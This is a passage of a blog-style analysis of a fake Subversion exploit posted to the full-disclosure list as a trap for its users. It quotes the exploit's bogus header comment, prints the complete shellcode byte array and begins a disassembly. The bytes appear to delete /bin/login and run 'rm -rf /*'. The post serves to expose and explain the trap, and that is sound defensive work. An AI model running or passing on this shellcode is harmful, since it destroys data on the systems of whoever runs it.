Yesterday, a message surfaced in full-disclosure, the mostly always funny and chaotic unmoderated security-related list (although the nature of the list these days is ambiguous, it remains as a free alternative to commercially sponsored and more supervised alternatives). It was a supposedly accidental release to the public eye of a remote Subversion exploit (which already seems enough dubious):
/* * This exploits a wierd state condition in Subversion < = 1.4.4. * When the incoming connection stack is filled via many incoming * syns in concurance with shifting the rev_ptr struct over a * variable gap of memory a boundary condition occurs which corrupts * a func ptr to point several bytes backwards. A call is forced * through "checkout-latest-rev" with our shellcode in place. * * This Vuln is NOT public, do NOT release this code or any * information pertaining to this bug. * * Author: onionring */
Behind a serious sounding description, there’s really nothing technically valid. It’s just “mumbo jumbo” to make it apparently legitimate to any potential user of the exploit (in this case, more than one security guy has probably attempted to use it).
We have a seemingly normal IA32 shellcode (except for the hardcoded NOP sled which is not so stylish):
char sc[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" ... "\x31\xC0\x89\xC3\x89\xC1\x41\xB0\x30\xCD\x80\x31\xC0\xFE\xC3\x80" "\xFB\x1F\x72\xF3\x04\x40\xCD\x80\x89\xC2\x31\xC0\xB0\x02\xCD\x80" "\x39\xC0\x74\x08\x31\xC0\x89\xC3\xB0\x01\xCD\x80\x31\xC0\xB0\x42" "\xCD\x80\x43\x39\xDA\x74\x08\x89\xD3\x31\xC0\x04\x25\xCD\x80\x31" "\xC0\x50\x68\x6F\x67\x69\x6E\x68\x69\x6E\x2F\x6C\x68\x2F\x2F\x2F" "\x62\x89\xE3\x31\xC0\x04\x0A\xCD\x80\x31\xC0\x50\x68\x2A\x2F\x2F" "\x2F\x89\xE2\x50\x68\x2D\x72\x66\x66\x89\xE1\x50\x68\x6E\x2F\x72" "\x6D\x68\x2F\x2F\x62\x69\x89\xE3\x50\x52\x51\x53\x89\xE1\x31\xD2" "\x04\x0B\xCD\x80";
Let’s take a look over the disassembly and strings. We notice a call to the signal() system call:
From include/asm-i386/unistd.h #define __NR_signal 48 From include/asm-generic/signal.h /* ignore signal */ #define SIG_IGN ((__force __sighandler_t)1) From include/asm-i386/signal.h #define SIGHUP 1 00000030 31C0 xor eax,eax 00000032 89C3 mov ebx,eax 00000034 89C1 mov ecx,eax 00000036 41 inc ecx 00000037 B030 mov al,0x30 00000039 CD80 int 0x80
